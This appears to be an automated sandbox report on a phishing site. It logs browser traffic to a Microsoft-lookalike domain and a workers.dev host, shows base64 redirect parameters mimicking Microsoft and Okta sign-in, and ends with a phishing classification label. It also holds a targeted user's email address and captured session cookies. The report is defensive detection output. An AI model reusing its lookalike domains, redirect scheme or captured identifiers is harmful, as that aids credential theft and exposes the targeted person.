Source: global traffic	HTTP traffic detected: GET /aadcdn.msftauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_ChpboAn7HyXj89A22M8mzg2.js HTTP/1.1Host: onmicrosoffice.onlineConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://onmicrosoffice.online/?i4pz914tl=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1iYXJiYXJhLnJlbnRsZXIlNDByb3MuY29tJmNsaWVudC1yZXF1ZXN0LWlkPWMwYmIxZDVmLWY4MTItZTJkMi1iYWU0LWVjNzY1Nzg5N2M2MyZwcm90ZWN0ZWR0b2tlbj10cnVlJmNsYWltcz0lN2IlMjJpZF90b2tlbiUyMiUzYSU3YiUyMnhtc19jYyUyMiUzYSU3YiUyMnZhbHVlcyUyMiUzYSU1YiUyMkNQMSUyMiU1ZCU3ZCU3ZCU3ZCZub25jZT02Mzg0OTU2MTg4Mjk1NzE5NTQuNzRjOGVhMDgtNWI4Zi00YWM1LWIxZTctYzIxMjIwNjAzN2JmJnN0YXRlPURZdEJDc01nRUFDMWVVc3ZCWTBhMTEwUHBVOHBxNWcya0NqWVFMOGZZV1p1STRVUTBfQTJsR1pFWUZqSVJ3aVd5RVZBRzhGcjlKa0tHMUtRYUZXZU02aGtDNnJzckhNbW1BWFRLc2Y3bU51ZjU5ZmVQbHQ5ZjdkNlBoUDNBZXRlNnJtWGZ2ZW10NV9PN2JnQQ==Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=W0H4QtKQv7br; qPdM.sig=U-Oy8SNmt-6MqabUMMHPOKH0nXY; ClientId=A794BA8C4B654B43ACDC7267ACAB95AC; OIDC=1; OpenIdConnect.nonce.v3.PKuzfwUTEvLItbobcOVAyzWnTNk46nlUCuz9anBslxY=638495618829571954.74c8ea08-5b8f-4ac5-b1e7-c212206037bf; X-OWA-RedirectHistory=ArLym14Bctf65mFk3Ag; esctx-yMbl01kPIpQ=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd851iqwTKcGtxOB7U7qoaXs9uh7LORIq6gTHyjKudzTC1CM19nIJXPrKFdQ4fkePJqr3gTVODApOxjtqnZftvgfLn5hLz4nBuNcv_3fTypvkZ8dFI4BL6wEcN2n5GYLOdG_8OuJ-90s0wVyqGG5Kbh8CAA; fpc=AvaH28Aio81MiaUB3bZI-Zw; esctx=PAQABBwEAAADnfolhJpSnRYB1SVj-Hgd8nV2pomA_lu1HEyz2Yh2a2abAjmlN7beaCAcudLYUmBxiRPThwuqOShgJIWDsK4j9vaRXLOWMCw7UBceW2sQUClzV4gKP4eqzQ76hLVD213_uewjjAfJC4QFwms6pWnb33QpGKgdnTPaVwqiCEVHhbQY3t8AFgQwAHQK8DWN78LcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: cd14fe4e.2690c0a545a7f22e8ae6844c.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/?qrc=barbara.rentler@ros.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?i4pz914tl=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1iYXJiYXJhLnJlbnRsZXIlNDByb3MuY29tJmNsaWVudC1yZXF1ZXN0LWlkPWMwYmIxZDVmLWY4MTItZTJkMi1iYWU0LWVjNzY1Nzg5N2M2MyZwcm90ZWN0ZWR0b2tlbj10cnVlJmNsYWltcz0lN2IlMjJpZF90b2tlbiUyMiUzYSU3YiUyMnhtc19jYyUyMiUzYSU3YiUyMnZhbHVlcyUyMiUzYSU1YiUyMkNQMSUyMiU1ZCU3ZCU3ZCU3ZCZub25jZT02Mzg0OTU2MTg4Mjk1NzE5NTQuNzRjOGVhMDgtNWI4Zi00YWM1LWIxZTctYzIxMjIwNjAzN2JmJnN0YXRlPURZdEJDc01nRUFDMWVVc3ZCWTBhMTEwUHBVOHBxNWcya0NqWVFMOGZZV1p1STRVUTBfQTJsR1pFWUZqSVJ3aVd5RVZBRzhGcjlKa0tHMUtRYUZXZU02aGtDNnJzckhNbW1BWFRLc2Y3bU51ZjU5ZmVQbHQ5ZjdkNlBoUDNBZXRlNnJtWGZ2ZW10NV9PN2JnQQ==&sso_reload=true HTTP/1.1Host: onmicrosoffice.onlineConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://onmicrosoffice.online/?i4pz914tl=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1iYXJiYXJhLnJlbnRsZXIlNDByb3MuY29tJmNsaWVudC1yZXF1ZXN0LWlkPWMwYmIxZDVmLWY4MTItZTJkMi1iYWU0LWVjNzY1Nzg5N2M2MyZwcm90ZWN0ZWR0b2tlbj10cnVlJmNsYWltcz0lN2IlMjJpZF90b2tlbiUyMiUzYSU3YiUyMnhtc19jYyUyMiUzYSU3YiUyMnZhbHVlcyUyMiUzYSU1YiUyMkNQMSUyMiU1ZCU3ZCU3ZCU3ZCZub25jZT02Mzg0OTU2MTg4Mjk1NzE5NTQuNzRjOGVhMDgtNWI4Zi00YWM1LWIxZTctYzIxMjIwNjAzN2JmJnN0YXRlPURZdEJDc01nRUFDMWVVc3ZCWTBhMTEwUHBVOHBxNWcya0NqWVFMOGZZV1p1STRVUTBfQTJsR1pFWUZqSVJ3aVd5RVZBRzhGcjlKa0tHMUtRYUZXZU02aGtDNnJzckhNbW1BWFRLc2Y3bU51ZjU5ZmVQbHQ5ZjdkNlBoUDNBZXRlNnJtWGZ2ZW10NV9PN2JnQQ==Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=W0H4QtKQv7br; qPdM.sig=U-Oy8SNmt-6MqabUMMHPOKH0nXY; ClientId=A794BA8C4B654B43ACDC7267ACAB95AC; OIDC=1; OpenIdConnect.nonce.v3.PKuzfwUTEvLItbobcOVAyzWnTNk46nlUCuz9anBslxY=638495618829571954.74c8ea08-5b8f-4ac5-b1e7-c212206037bf; X-OWA-RedirectHistory=ArLym14Bctf65mFk3Ag; esctx-yMbl01kPIpQ=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd851iqwTKcGtxOB7U7qoaXs9uh7LORIq6gTHyjKudzTC1CM19nIJXPrKFdQ4fke
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: cd14fe4e.2690c0a545a7f22e8ae6844c.workers.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?i4pz914tl=aHR0cHM6Ly9yb3NzLm9rdGEuY29tL2FwcC9vZmZpY2UzNjUvZXhrYnl6aDgzNlB6dkRTZGEweDcvc3NvL3dzZmVkL3Bhc3NpdmU/bG9naW5faGludD1iYXJiYXJhLnJlbnRsZXIlNDByb3MuY29tJmNsaWVudC1yZXF1ZXN0LWlkPWMwYmIxZDVmLWY4MTItZTJkMi1iYWU0LWVjNzY1Nzg5N2M2MyZ1c2VybmFtZT1iYXJiYXJhLnJlbnRsZXIlNDByb3MuY29tJndhPXdzaWduaW4xLjAmd3RyZWFsbT11cm4lM2FmZWRlcmF0aW9uJTNhTWljcm9zb2Z0T25saW5lJndjdHg9ZXN0c3JlZGlyZWN0JTNkMiUyNmVzdHNyZXF1ZXN0JTNkclFRSUFSQUFqVkVfYUJOaEhMMHZsNTVwckJxNnRBaWlIRTdWUy02NzNIOFF2TVFralRFMnRkYjBLaEl1bC05TDB0emxTLTh1cVZxN09TZzRGRGNkT2pobUVpZEpsbzdTS1FndW5VUkVpb2lLVTBjVFhOejA4ZVB4aGgtUHgzc0xOSXhEX1NMX0J3STNZWTdIR0hJMm1xaV80TTFHWTVWendfM1o0X2VmQnAtXzljcFBIOWw5Y0w0UkJCMWZUeVJJTjNBSWFjVUp4azBieFczaUpzaVdsWGdMd0FpQUl3Q2VoLWFxbGpjLUstNmhkdUFnNzZwSF9NbGZQNlRJU1ZYVUpCbXFxcUJKQ3RRa01hNkl0b29zWHVXa3FvbzUwYklscmdxUnd0a0NGQVJlNXBOS0ZSLUd6aXdaM2FBaFRJaDR6WWZvVjJnYUU4LXRkSWdmdktSM3dUVXpTS1g5WWoxanBDRmE5WHNwazdjZzVFdWRWYld6S2RXRlZuckRYTDZoWXJPODNzMkxxOHQ4eFJDYzNIckd6RzdrYjIwMXl3OHlkNHljbXZXMDY2MUNEaGFXcld3WkZlVkdLeTE3dnJkWWRGMWo3WGJCeDRwN3M0c2xEYU9TRTJoWXFjbWxSaWxwb0FESm5ydUdlOGdOcE1xU1VxMGJmZnFfdW41RE0tTmlYTkktb0JuU1FlMW1iUlFHSDhQZ2EzaUdwX1ZJSkJxajVxa0wxSEVZdkpvYXpfSkRPNnR2YVhQRjRmeUhZZVJ5RWh4TUpZeUcyWk9zVEQ0dGtuYS1vR3lxWlRmVFd1a1ZMeFd6NDNDRmhGQjNOcEFucGpJNTg0cXN3MTBHN0RMTWdKbU8wREdLcGRNbGVNU0Fud3g0Y29JYVRQOXI0OUZKY0RnalJobmJzWnF1UDd1d3pUWnJsWUMwVUp2VnQ5bjdybC14N1lucVdVNFgtYXgtbHgzN3NfZDJkbmIyVDFISHA3X3NQWDYzOS16Rjk4WFhNZW8zMCM= HTTP/1.1Host: onmicrosoffice.onlineConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://onmicrosoffice.online/?i4pz914tl=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1iYXJiYXJhLnJlbnRsZXIlNDByb3MuY29tJmNsaWVudC1yZXF1ZXN0LWlkPWMwYmIxZDVmLWY4MTItZTJkMi1iYWU0LWVjNzY1Nzg5N2M2MyZwcm90ZWN0ZWR0b2tlbj10cnVlJmNsYWltcz0lN2IlMjJpZF90b2tlbiUyMiUzYSU3YiUyMnhtc19jYyUyMiUzYSU3YiUyMnZhbHVlcyUyMiUzYSU1YiUyMkNQMSUyMiU1ZCU3ZCU3ZCU3ZCZub25jZT02Mzg0OTU2MTg4Mjk1NzE5NTQuNzRjOGVhMDgtNWI4Zi00YWM1LWIxZTctYzIxMjIwNjAzN2JmJnN0YXRlPURZdEJDc01nRUFDMWVVc3ZCWTBhMTEwUHBVOHBxNWcya0NqWVFMOGZZV1p1STRVUTBfQTJsR1pFWUZqSVJ3aVd5RVZBRzhGcjlKa0tHMUtRYUZXZU02aGtDNnJzckhNbW1BWFRLc2Y3bU51ZjU5ZmVQbHQ5ZjdkNlBoUDNBZXRlNnJtWGZ2ZW10NV9PN2JnQQ==Accept-Enco
Source: global traffic	HTTP traffic detected: GET /login/login.htm?fromURI=%2Fapp%2Foffice365%2Fexkbyzh836PzvDSda0x7%2Fsso%2Fwsfed%2Fpassive%3Flogin_hint%3Dbarbara.rentler%2540ros.com%26client-request-id%3Dc0bb1d5f-f812-e2d2-bae4-ec7657897c63%26username%3Dbarbara.rentler%2540ros.com%26wa%3Dwsignin1.0%26wtrealm%3Durn%253afederation%253aMicrosoftOnline%26wctx%3Destsredirect%253d2%2526estsrequest%253drQQIARAAjVE_aBNhHL0vl55prBq6tAiiHE7VS-673H8QvMQkjTE2tdb0KhIul-9L0tzlS-8uqVq7OSg4FDcdOjhmEidJlo7SKQgunUREioiKU0cTXNz08ePxhh-Px3sLNIxD_SL_BwI3YY7HGHI2mqi_4M1GY5Vzw_3Z4_efBp-_9cpPH9l9cL4RBB1fTyRIN3AIacUJxk0bxW3iJsiWlXgLwAiAIwCeh-aqljc-K-6hduAg76pH_MlfP6TISVXUJBmqqqBJCtQkMa6ItoosXuWkqoo50bIlrgqRwtkCFARe5pNKFR-GziwZ3aAhTIh4zYfoV2gaE8-tdIgfvKR3wTUzSKX9Yj1jpCFa9Xspk7cg5EudVbWzKdWFVnrDXL6hYrO83s2Lq8t8xRCc3HrGzG7kb201yw8yd4ycmvW0661CDhaWrWwZFeVGKy17vrdYdF1j7XbBx4p7s4slDaOSE2hYqcmlRilpoADJnruGe8gNpMqSUq0bffq_un5DM-NiXNI-oBnSQe1mbRQGH8Pga3iGp_VIJBqj5qkL1HEYvJoaz_JDO6tvaXPF4fyHYeRyEhxMJYyG2ZOsTD4tkna-oGyqZTfTWukVLxWz43CFhFB3NpAnpjI584qsw10G7DLMgJmO0DGKpdMleMSAnwx4coIaTP9r49FJcDgjRhnbsZquP7uwzTZrlYC0UJvVt9n7rl-x7YnqWU4X-ax-lx37s_d2dnb2T1HHp7_sPX639-zF98XXMeo30 HTTP/1.1Host: onmicrosoffice.onlineConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://onmicrosoffice.online/?i4pz914tl=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1iYXJiYXJhLnJlbnRsZXIlNDByb3MuY29tJmNsaWVudC1yZXF1ZXN0LWlkPWMwYmIxZDVmLWY4MTItZTJkMi1iYWU0LWVjNzY1Nzg5N2M2MyZwcm90ZWN0ZWR0b2tlbj10cnVlJmNsYWltcz0lN2IlMjJpZF90b2tlbiUyMiUzYSU3YiUyMnhtc19jYyUyMiUzYSU3YiUyMnZhbHVlcyUyMiUzYSU1YiUyMkNQMSUyMiU1ZCU3ZCU3ZCU3ZCZub25jZT02Mzg0OTU2MTg4Mjk1NzE5NTQuNzRjOGVhMDgtNWI4Zi00YWM1LWIxZTctYzIxMjIwNjAzN2JmJnN0YXRlPURZdEJDc01nRUFDMWVVc3ZCWTBhMTEwUHBVOHBxNWcya0NqWVFMOGZZV1p1STRVUTBfQTJsR1pFWUZqSVJ3aVd5RVZBRzhGcjlKa0tHMUtRYUZXZU02aGtDNnJzckhNbW1BWFRLc2Y3bU51ZjU5ZmVQbHQ5ZjdkNlBoUDNBZXRlNnJtWGZ2ZW10NV9PN2JnQQ==Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=W0H4QtKQv7br; qPdM.sig=U-Oy8SNmt-6MqabUMMHPOKH0nXY; ClientId=A794BA8C4B654B43ACDC7267ACAB95AC; OIDC=1; OpenIdConnect.nonce.v3.PKuzfwUTEvLItbobcOVAyzWnTNk46nlUCuz9anBslxY=638495618829571954.74c8ea08-5b8f-4ac5-b1e7-c212206037bf; X-OWA-Redirect

Source: global traffic	DNS traffic detected: DNS query: insidesales-email.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev
Source: global traffic	DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: onmicrosoffice.online

Source: unknown

HTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/677264152:1713960777:cbIXwftb7jRjxhN42jiBklFyaR8QTE9L7gvOtH3VLU8/879669880fea0acd/a7423da5d113469 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 2803sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: a7423da5d113469sec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/vtjpx/0x4AAAAAAAX1FyqfrSUlMHQ3/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateSet-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponlyStrict-Transport-Security: max-age=31536000; includeSubDomainsP3P: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: 4d9ca318-3e0a-4275-afec-4ed068470b01x-ms-ests-server: 2.1.17846.6 - NCUS ProdSlicesnel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.PReferrer-Policy: strict-origin-when-cross-originDate: Wed, 24 Apr 2024 13:24:47 GMTConnection: closeContent-Length: 0Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';

Source: chromecache_56.2.dr	String found in binary or memory: http://knockoutjs.com/
Source: chromecache_56.2.dr	String found in binary or memory: http://www.opensource.org/licenses/mit-license.php)
Source: chromecache_54.2.dr, chromecache_48.2.dr	String found in binary or memory: https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback
Source: chromecache_56.2.dr	String found in binary or memory: https://github.com/douglascrockford/JSON-js
Source: chromecache_49.2.dr	String found in binary or memory: https://onmicrosoffice.online?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL29ub

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 23.206.6.29:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.206.6.29:443 -> 192.168.2.4:49745 version: TLS 1.2

Source: classification engine

Classification label: mal60.phis.win@20/15@16/9

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2968 --field-trial-handle=2924,i,12212526387744986071,14092912345193000886,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
